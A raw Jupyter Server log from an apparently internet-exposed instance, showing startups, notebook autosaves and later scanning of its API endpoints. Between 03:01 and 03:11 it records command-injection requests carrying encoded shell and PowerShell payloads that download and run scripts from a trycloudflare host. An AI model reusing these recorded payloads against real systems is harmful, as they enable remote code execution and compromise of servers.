[I 2024-08-01 21:10:06.341 ServerApp] jupyter_lsp | extension was successfully linked.
[I 2024-08-01 21:10:06.345 ServerApp] jupyter_server_terminals | extension was successfully linked.
[I 2024-08-01 21:10:06.351 ServerApp] jupyterlab | extension was successfully linked.
[W 2024-08-01 21:10:06.356 ServerApp] notebook_dir is deprecated, use root_dir
[I 2024-08-01 21:10:06.356 ServerApp] notebook | extension was successfully linked.
[I 2024-08-01 21:10:06.570 ServerApp] notebook_shim | extension was successfully linked.
[W 2024-08-01 21:10:06.584 ServerApp] WARNING: The Jupyter server is listening on all IP addresses and not using encryption. This is not recommended.
[I 2024-08-01 21:10:06.585 ServerApp] notebook_shim | extension was successfully loaded.
[I 2024-08-01 21:10:06.587 ServerApp] jupyter_lsp | extension was successfully loaded.
[I 2024-08-01 21:10:06.588 ServerApp] jupyter_server_terminals | extension was successfully loaded.
[I 2024-08-01 21:10:06.589 LabApp] JupyterLab extension loaded from /usr/local/lib/python3.10/dist-packages/jupyterlab
[I 2024-08-01 21:10:06.590 LabApp] JupyterLab application directory is /usr/local/share/jupyter/lab
[I 2024-08-01 21:10:06.590 LabApp] Extension Manager is 'pypi'.
[I 2024-08-01 21:10:06.664 ServerApp] jupyterlab | extension was successfully loaded.
[I 2024-08-01 21:10:06.668 ServerApp] notebook | extension was successfully loaded.
[I 2024-08-01 21:10:06.668 ServerApp] Serving notebooks from local directory: /home
[I 2024-08-01 21:10:06.668 ServerApp] Jupyter Server 2.14.1 is running at:
[I 2024-08-01 21:10:06.668 ServerApp] http://localhost:8888/tree
[I 2024-08-01 21:10:06.668 ServerApp]     http://127.0.0.1:8888/tree
[I 2024-08-01 21:10:06.668 ServerApp] Use Control-C to stop this server and shut down all kernels (twice to skip confirmation).
[W 2024-08-01 21:10:06.676 ServerApp] No web browser found: Error('could not locate runnable browser').
[I 2024-08-01 21:10:06.695 ServerApp] Skipped non-installed server(s): bash-language-server, dockerfile-language-server-nodejs, javascript-typescript-langserver, jedi-language-server, julia-language-server, pyright, python-language-server, python-lsp-server, r-languageserver, sql-language-server, texlab, typescript-language-server, unified-language-server, vscode-css-languageserver-bin, vscode-html-languageserver-bin, vscode-json-languageserver-bin, yaml-language-server
[I 2024-08-01 21:10:12.412 ServerApp] 302 GET / (@117.176.248.71) 0.42ms
[I 2024-08-01 21:10:35.145 ServerApp] jupyter_lsp | extension was successfully linked.
[I 2024-08-01 21:10:35.149 ServerApp] jupyter_server_terminals | extension was successfully linked.
[I 2024-08-01 21:10:35.153 ServerApp] jupyterlab | extension was successfully linked.
[W 2024-08-01 21:10:35.157 ServerApp] notebook_dir is deprecated, use root_dir
[I 2024-08-01 21:10:35.157 ServerApp] notebook | extension was successfully linked.
[I 2024-08-01 21:10:35.354 ServerApp] notebook_shim | extension was successfully linked.
[W 2024-08-01 21:10:35.367 ServerApp] WARNING: The Jupyter server is listening on all IP addresses and not using encryption. This is not recommended.
[I 2024-08-01 21:10:35.368 ServerApp] notebook_shim | extension was successfully loaded.
[I 2024-08-01 21:10:35.370 ServerApp] jupyter_lsp | extension was successfully loaded.
[I 2024-08-01 21:10:35.371 ServerApp] jupyter_server_terminals | extension was successfully loaded.
[I 2024-08-01 21:10:35.372 LabApp] JupyterLab extension loaded from /usr/local/lib/python3.10/dist-packages/jupyterlab
[I 2024-08-01 21:10:35.372 LabApp] JupyterLab application directory is /usr/local/share/jupyter/lab
[I 2024-08-01 21:10:35.372 LabApp] Extension Manager is 'pypi'.
[I 2024-08-01 21:10:35.439 ServerApp] jupyterlab | extension was successfully loaded.
[I 2024-08-01 21:10:35.442 ServerApp] notebook | extension was successfully loaded.
[I 2024-08-01 21:10:35.443 ServerApp] The port 8888 is already in use, trying another port.
[I 2024-08-01 21:10:35.443 ServerApp] Serving notebooks from local directory: /home
[I 2024-08-01 21:10:35.443 ServerApp] Jupyter Server 2.14.1 is running at:
[I 2024-08-01 21:10:35.443 ServerApp] http://localhost:8889/tree
[I 2024-08-01 21:10:35.443 ServerApp]     http://127.0.0.1:8889/tree
[I 2024-08-01 21:10:35.443 ServerApp] Use Control-C to stop this server and shut down all kernels (twice to skip confirmation).
[W 2024-08-01 21:10:35.448 ServerApp] No web browser found: Error('could not locate runnable browser').
[I 2024-08-01 21:10:35.460 ServerApp] Skipped non-installed server(s): bash-language-server, dockerfile-language-server-nodejs, javascript-typescript-langserver, jedi-language-server, julia-language-server, pyright, python-language-server, python-lsp-server, r-languageserver, sql-language-server, texlab, typescript-language-server, unified-language-server, vscode-css-languageserver-bin, vscode-html-languageserver-bin, vscode-json-languageserver-bin, yaml-language-server
[I 2024-08-01 21:10:37.869 ServerApp] Interrupted...
[I 2024-08-01 21:10:42.069 ServerApp] jupyter_lsp | extension was successfully linked.
[I 2024-08-01 21:10:42.073 ServerApp] jupyter_server_terminals | extension was successfully linked.
[I 2024-08-01 21:10:42.079 ServerApp] jupyterlab | extension was successfully linked.
[W 2024-08-01 21:10:42.085 ServerApp] notebook_dir is deprecated, use root_dir
[I 2024-08-01 21:10:42.085 ServerApp] notebook | extension was successfully linked.
[I 2024-08-01 21:10:42.285 ServerApp] notebook_shim | extension was successfully linked.
[W 2024-08-01 21:10:42.298 ServerApp] WARNING: The Jupyter server is listening on all IP addresses and not using encryption. This is not recommended.
[I 2024-08-01 21:10:42.298 ServerApp] notebook_shim | extension was successfully loaded.
[I 2024-08-01 21:10:42.300 ServerApp] jupyter_lsp | extension was successfully loaded.
[I 2024-08-01 21:10:42.301 ServerApp] jupyter_server_terminals | extension was successfully loaded.
[I 2024-08-01 21:10:42.302 LabApp] JupyterLab extension loaded from /usr/local/lib/python3.10/dist-packages/jupyterlab
[I 2024-08-01 21:10:42.302 LabApp] JupyterLab application directory is /usr/local/share/jupyter/lab
[I 2024-08-01 21:10:42.302 LabApp] Extension Manager is 'pypi'.
[I 2024-08-01 21:10:42.367 ServerApp] jupyterlab | extension was successfully loaded.
[I 2024-08-01 21:10:42.370 ServerApp] notebook | extension was successfully loaded.
[I 2024-08-01 21:10:42.371 ServerApp] The port 8888 is already in use, trying another port.
[I 2024-08-01 21:10:42.371 ServerApp] Serving notebooks from local directory: /home
[I 2024-08-01 21:10:42.371 ServerApp] Jupyter Server 2.14.1 is running at:
[I 2024-08-01 21:10:42.371 ServerApp] http://localhost:8889/tree
[I 2024-08-01 21:10:42.371 ServerApp]     http://127.0.0.1:8889/tree
[I 2024-08-01 21:10:42.371 ServerApp] Use Control-C to stop this server and shut down all kernels (twice to skip confirmation).
[W 2024-08-01 21:10:42.375 ServerApp] No web browser found: Error('could not locate runnable browser').
[I 2024-08-01 21:10:42.387 ServerApp] Skipped non-installed server(s): bash-language-server, dockerfile-language-server-nodejs, javascript-typescript-langserver, jedi-language-server, julia-language-server, pyright, python-language-server, python-lsp-server, r-languageserver, sql-language-server, texlab, typescript-language-server, unified-language-server, vscode-css-languageserver-bin, vscode-html-languageserver-bin, vscode-json-languageserver-bin, yaml-language-server
[I 2024-08-01 21:11:56.712 ServerApp] jupyter_lsp | extension was successfully linked.
[I 2024-08-01 21:11:56.716 ServerApp] jupyter_server_terminals | extension was successfully linked.
[I 2024-08-01 21:11:56.720 ServerApp] jupyterlab | extension was successfully linked.
[W 2024-08-01 21:11:56.725 ServerApp] notebook_dir is deprecated, use root_dir
[I 2024-08-01 21:11:56.725 ServerApp] notebook | extension was successfully linked.
[I 2024-08-01 21:11:56.928 ServerApp] notebook_shim | extension was successfully linked.
[W 2024-08-01 21:11:56.941 ServerApp] WARNING: The Jupyter server is listening on all IP addresses and not using encryption. This is not recommended.
[I 2024-08-01 21:11:56.942 ServerApp] notebook_shim | extension was successfully loaded.
[I 2024-08-01 21:11:56.944 ServerApp] jupyter_lsp | extension was successfully loaded.
[I 2024-08-01 21:11:56.945 ServerApp] jupyter_server_terminals | extension was successfully loaded.
[I 2024-08-01 21:11:56.946 LabApp] JupyterLab extension loaded from /usr/local/lib/python3.10/dist-packages/jupyterlab
[I 2024-08-01 21:11:56.946 LabApp] JupyterLab application directory is /usr/local/share/jupyter/lab
[I 2024-08-01 21:11:56.946 LabApp] Extension Manager is 'pypi'.
[I 2024-08-01 21:11:57.012 ServerApp] jupyterlab | extension was successfully loaded.
[I 2024-08-01 21:11:57.015 ServerApp] notebook | extension was successfully loaded.
[I 2024-08-01 21:11:57.015 ServerApp] Serving notebooks from local directory: /home
[I 2024-08-01 21:11:57.015 ServerApp] Jupyter Server 2.14.1 is running at:
[I 2024-08-01 21:11:57.015 ServerApp] http://localhost:8888/tree
[I 2024-08-01 21:11:57.016 ServerApp]     http://127.0.0.1:8888/tree
[I 2024-08-01 21:11:57.016 ServerApp] Use Control-C to stop this server and shut down all kernels (twice to skip confirmation).
[W 2024-08-01 21:11:57.020 ServerApp] No web browser found: Error('could not locate runnable browser').
[I 2024-08-01 21:11:57.033 ServerApp] Skipped non-installed server(s): bash-language-server, dockerfile-language-server-nodejs, javascript-typescript-langserver, jedi-language-server, julia-language-server, pyright, python-language-server, python-lsp-server, r-languageserver, sql-language-server, texlab, typescript-language-server, unified-language-server, vscode-css-languageserver-bin, vscode-html-languageserver-bin, vscode-json-languageserver-bin, yaml-language-server
[I 2024-08-01 21:12:06.830 ServerApp] 302 GET / (@117.176.248.71) 0.44ms
[I 2024-08-01 21:12:21.439 ServerApp] Kernel started: f4b02ff0-99f3-4fe2-a615-3fc19aa9b142
[I 2024-08-01 21:12:22.146 ServerApp] Connecting to kernel f4b02ff0-99f3-4fe2-a615-3fc19aa9b142.
[I 2024-08-01 21:12:22.147 ServerApp] Connecting to kernel f4b02ff0-99f3-4fe2-a615-3fc19aa9b142.
[I 2024-08-01 21:12:22.149 ServerApp] Connecting to kernel f4b02ff0-99f3-4fe2-a615-3fc19aa9b142.
[I 2024-08-01 21:12:28.375 ServerApp] Connecting to kernel f4b02ff0-99f3-4fe2-a615-3fc19aa9b142.
[I 2024-08-01 21:15:29.593 ServerApp] Starting buffering for f4b02ff0-99f3-4fe2-a615-3fc19aa9b142:51294b76-b95f-46a0-b0fc-d3ef7d0b2602
[I 2024-08-01 21:15:30.398 ServerApp] Connecting to kernel f4b02ff0-99f3-4fe2-a615-3fc19aa9b142.
[I 2024-08-01 21:15:30.628 ServerApp] Starting buffering for f4b02ff0-99f3-4fe2-a615-3fc19aa9b142:b0dccf00-eed8-4326-9596-b50f4d73a015
[I 2024-08-01 21:15:31.114 ServerApp] Connecting to kernel f4b02ff0-99f3-4fe2-a615-3fc19aa9b142.
[I 2024-08-01 21:17:30.915 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 21:19:31.146 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 21:21:31.429 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 21:23:31.658 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 21:27:31.889 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 21:28:28.243 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 21:32:28.469 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 21:32:42.023 ServerApp] 302 GET / (@92.249.48.208) 0.46ms
[I 2024-08-01 21:42:28.736 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 21:46:29.075 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 21:48:29.298 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 21:49:02.994 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 21:51:03.261 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 21:53:03.527 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 21:53:31.057 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 21:55:31.313 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 21:57:31.536 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 21:59:31.764 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:05:32.029 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:07:32.305 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:08:46.764 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[IPKernelApp] ERROR | Failed to open SQLite history /root/.ipython/profile_default/history.sqlite (datatype mismatch).
[IPKernelApp] ERROR | History file was moved to /root/.ipython/profile_default/history-corrupt-2024-08-01T22.09.04.865115.sqlite and a new file created.
[I 2024-08-01 22:09:52.005 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:09:59.030 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:10:15.461 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:13:41.903 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:13:46.025 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:14:52.244 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:16:17.902 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:18:18.153 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:20:18.421 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:20:19.019 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:20:53.726 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:22:54.422 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:24:54.769 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:26:55.035 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:28:55.386 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:30:55.797 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:32:56.046 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:34:56.350 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:36:56.656 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:38:56.886 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:39:10.094 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:41:10.357 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:42:17.253 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:43:24.427 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:44:23.373 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:44:36.429 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:46:36.668 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:48:36.959 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:50:37.289 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:52:37.526 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:54:37.781 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:56:38.099 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 22:58:31.307 ServerApp] Kernel interrupted: f4b02ff0-99f3-4fe2-a615-3fc19aa9b142
[I 2024-08-01 22:58:38.325 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 23:00:38.561 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 23:02:38.883 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 23:04:39.126 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 23:06:39.413 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 23:08:39.654 ServerApp] Saving file at /Rampup2024/1-Basic Alogrithm/0. Random.ipynb
[I 2024-08-01 23:19:21.356 ServerApp] Starting buffering for f4b02ff0-99f3-4fe2-a615-3fc19aa9b142:48a398d5-cdce-4bec-b4b6-f92087efe992
[I 2024-08-02 01:23:44.931 ServerApp] 302 GET / (@118.123.105.69) 0.52ms
[I 2024-08-02 01:23:45.184 ServerApp] 302 GET / (@118.123.105.69) 0.40ms
[I 2024-08-02 01:23:45.219 JupyterNotebookApp] 302 GET /tree? (@118.123.105.69) 0.61ms
[W 2024-08-02 02:11:29.399 ServerApp] 405 HEAD / (@123.249.68.177) 0.64ms referer=None
[I 2024-08-02 02:11:29.450 ServerApp] 302 GET / (@123.249.68.177) 0.41ms
[I 2024-08-02 02:11:29.464 JupyterNotebookApp] 302 GET /tree (@123.249.68.177) 0.52ms
[W 2024-08-02 02:18:21.995 ServerApp] 405 HEAD / (@123.249.90.23) 0.42ms referer=None
[I 2024-08-02 02:18:22.027 ServerApp] 302 GET / (@123.249.90.23) 0.41ms
[I 2024-08-02 02:18:22.035 JupyterNotebookApp] 302 GET /tree (@123.249.90.23) 0.51ms
[I 2024-08-02 02:27:04.348 ServerApp] 302 GET / (@92.249.48.208) 0.49ms
[W 2024-08-02 02:42:40.366 ServerApp] wrote error: 'Method Not Allowed'
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1788, in _execute
        result = method(*self.path_args, **self.path_kwargs)
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 269, in _unimplemented_method
        raise HTTPError(405)
    tornado.web.HTTPError: HTTP 405: Method Not Allowed
[W 2024-08-02 02:42:40.385 ServerApp] 405 HEAD /api/kernels?1722519356441 (@123.249.65.172) 19.60ms referer=None
[W 2024-08-02 02:42:40.472 ServerApp] wrote error: 'Forbidden'
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1788, in _execute
        result = method(*self.path_args, **self.path_kwargs)
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 3289, in wrapper
        url = self.get_login_url()
      File "/usr/local/lib/python3.10/dist-packages/jupyter_server/base/handlers.py", line 783, in get_login_url
        raise web.HTTPError(403)
    tornado.web.HTTPError: HTTP 403: Forbidden
[W 2024-08-02 02:42:40.474 ServerApp] 403 GET /api/kernels?1722519356441 (@123.249.65.172) 2.61ms referer=None
[W 2024-08-02 02:43:00.195 ServerApp] wrote error: 'Method Not Allowed'
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1788, in _execute
        result = method(*self.path_args, **self.path_kwargs)
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 269, in _unimplemented_method
        raise HTTPError(405)
    tornado.web.HTTPError: HTTP 405: Method Not Allowed
[W 2024-08-02 02:43:00.196 ServerApp] 405 HEAD /api/kernels?1722519356441 (@123.249.65.172) 0.88ms referer=None
[W 2024-08-02 02:43:00.202 ServerApp] wrote error: 'Forbidden'
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1788, in _execute
        result = method(*self.path_args, **self.path_kwargs)
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 3289, in wrapper
        url = self.get_login_url()
      File "/usr/local/lib/python3.10/dist-packages/jupyter_server/base/handlers.py", line 783, in get_login_url
        raise web.HTTPError(403)
    tornado.web.HTTPError: HTTP 403: Forbidden
[W 2024-08-02 02:43:00.203 ServerApp] 403 GET /api/kernels?1722519356441 (@123.249.65.172) 0.76ms referer=None
[W 2024-08-02 02:49:37.160 ServerApp] wrote error: 'Method Not Allowed'
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1788, in _execute
        result = method(*self.path_args, **self.path_kwargs)
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 269, in _unimplemented_method
        raise HTTPError(405)
    tornado.web.HTTPError: HTTP 405: Method Not Allowed
[W 2024-08-02 02:49:37.160 ServerApp] 405 HEAD /api/kernelspecs?1722517886075 (@124.71.235.245) 1.17ms referer=None
[W 2024-08-02 02:49:37.245 ServerApp] wrote error: 'Forbidden'
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1788, in _execute
        result = method(*self.path_args, **self.path_kwargs)
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 3289, in wrapper
        url = self.get_login_url()
      File "/usr/local/lib/python3.10/dist-packages/jupyter_server/base/handlers.py", line 783, in get_login_url
        raise web.HTTPError(403)
    tornado.web.HTTPError: HTTP 403: Forbidden
[W 2024-08-02 02:49:37.246 ServerApp] 403 GET /api/kernelspecs?1722517886075 (@124.71.235.245) 1.19ms referer=None
[W 2024-08-02 02:53:36.989 ServerApp] wrote error: 'Method Not Allowed'
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1788, in _execute
        result = method(*self.path_args, **self.path_kwargs)
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 269, in _unimplemented_method
        raise HTTPError(405)
    tornado.web.HTTPError: HTTP 405: Method Not Allowed
[W 2024-08-02 02:53:36.989 ServerApp] 405 HEAD /api/kernels?1722518088663 (@123.249.82.229) 0.96ms referer=None
[W 2024-08-02 02:53:37.035 ServerApp] wrote error: 'Forbidden'
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1788, in _execute
        result = method(*self.path_args, **self.path_kwargs)
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 3289, in wrapper
        url = self.get_login_url()
      File "/usr/local/lib/python3.10/dist-packages/jupyter_server/base/handlers.py", line 783, in get_login_url
        raise web.HTTPError(403)
    tornado.web.HTTPError: HTTP 403: Forbidden
[W 2024-08-02 02:53:37.035 ServerApp] 403 GET /api/kernels?1722518088663 (@123.249.82.229) 0.91ms referer=None
[W 2024-08-02 03:01:11.444 ServerApp] 404 GET /api/ping/;%60echo%20KGN1cmwgLWsgaHR0cHM6Ly9kaXNjaXBsaW5lLXBhZC1kcml2ZXItY2hlYXBlci50cnljbG91ZGZsYXJlLmNvbS9vZGluIHx8IHdnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtTy0gaHR0cHM6Ly9kaXNjaXBsaW5lLXBhZC1kcml2ZXItY2hlYXBlci50cnljbG91ZGZsYXJlLmNvbS9vZGluKSB8IGJhc2ggLXNo%20%7C%20base64%20-d%20%7C%20sh%60 (@107.172.34.27) 8.81ms referer=None
[W 2024-08-02 03:05:57.060 ServerApp] 404 GET /AdminPage/conf/runCmd?cmd=echo%20KGN1cmwgLWsgaHR0cHM6Ly9kaXNjaXBsaW5lLXBhZC1kcml2ZXItY2hlYXBlci50cnljbG91ZGZsYXJlLmNvbS9vZGluIHx8IHdnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtTy0gaHR0cHM6Ly9kaXNjaXBsaW5lLXBhZC1kcml2ZXItY2hlYXBlci50cnljbG91ZGZsYXJlLmNvbS9vZGluKSB8IGJhc2ggLXNo%20%7C%20base64%20-d%20%7C%20sh (@107.172.34.27) 1.38ms referer=None
[I 2024-08-02 03:11:17.842 ServerApp] 302 GET /?n=%0A&cmd=powershell%20-Exec%20ByPass%20-Nol%20-Enc%20dAByAHkAIAB7ACAASQBFAFgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGQAaQBzAGMAaQBwAGwAaQBuAGUALQBwAGEAZAAtAGQAcgBpAHYAZQByAC0AYwBoAGUAYQBwAGUAcgAuAHQAcgB5AGMAbABvAHUAZABmAGwAYQByAGUALgBjAG8AbQAvAHcAaQBuAC8AbABvAGsAaQAuAHAAcwAxACcAKQApACAAfQAgAGMAYQB0AGMAaAAgAHsAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJwBoAHQAdABwAHMAOgAvAC8AZABpAHMAYwBpAHAAbABpAG4AZQAtAHAAYQBkAC0AZAByAGkAdgBlAHIALQBjAGgAZQBhAHAAZQByAC4AdAByAHkAYwBsAG8AdQBkAGYAbABhAHIAZQAuAGMAbwBtAC8AdwBpAG4ALwBsAG8AawBpAC4AcABzADEAJwAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAB8ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAfQA%3D&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} (@107.172.34.27) 0.49ms
[I 2024-08-02 03:14:50.585 ServerApp] 302 GET / (@57.151.70.168) 0.38ms
[W 2024-08-02 03:29:37.613 ServerApp] 403 POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore (107.172.34.27): '_xsrf' argument missing from POST
[W 2024-08-02 03:29:37.614 ServerApp] 403 POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore (@107.172.34.27) 1.66ms referer=None
[W 2024-08-02 03:42:13.754 ServerApp] wrote error: 'Method Not Allowed'
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1788, in _execute
        result = method(*self.path_args, **self.path_kwargs)
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 269, in _unimplemented_method
        raise HTTPError(405)
    tornado.web.HTTPError: HTTP 405: Method Not Allowed
[W 2024-08-02 03:42:13.755 ServerApp] 405 HEAD /api/kernels?1722522793980 (@123.249.90.104) 0.91ms referer=None
[W 2024-08-02 03:42:13.823 ServerApp] wrote error: 'Forbidden'
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1788, in _execute
        result = method(*self.path_args, **self.path_kwargs)
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 3289, in wrapper
        url = self.get_login_url()
      File "/usr/local/lib/python3.10/dist-packages/jupyter_server/base/handlers.py", line 783, in get_login_url
        raise web.HTTPError(403)
    tornado.web.HTTPError: HTTP 403: Forbidden
[W 2024-08-02 03:42:13.824 ServerApp] 403 GET /api/kernels?1722522793980 (@123.249.90.104) 1.03ms referer=None
[W 2024-08-02 03:42:53.078 ServerApp] wrote error: 'Method Not Allowed'
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1788, in _execute
        result = method(*self.path_args, **self.path_kwargs)
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 269, in _unimplemented_method
        raise HTTPError(405)
    tornado.web.HTTPError: HTTP 405: Method Not Allowed
[W 2024-08-02 03:42:53.079 ServerApp] 405 HEAD /api/kernelspecs?1722522119064 (@123.249.116.81) 1.18ms referer=None
[W 2024-08-02 03:42:53.217 ServerApp] wrote error: 'Forbidden'
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1788, in _execute
        result = method(*self.path_args, **self.path_kwargs)
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 3289, in wrapper
        url = self.get_login_url()
      File "/usr/local/lib/python3.10/dist-packages/jupyter_server/base/handlers.py", line 783, in get_login_url
        raise web.HTTPError(403)
    tornado.web.HTTPError: HTTP 403: Forbidden
[W 2024-08-02 03:42:53.217 ServerApp] 403 GET /api/kernelspecs?1722522119064 (@123.249.116.81) 0.94ms referer=None
[W 2024-08-02 03:44:16.088 TerminalsExtensionApp] wrote error: 'Method Not Allowed'
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/tornado/web.py", line 1788, in _execute
        result = method(*self.path_args, **self.path_kwargs)
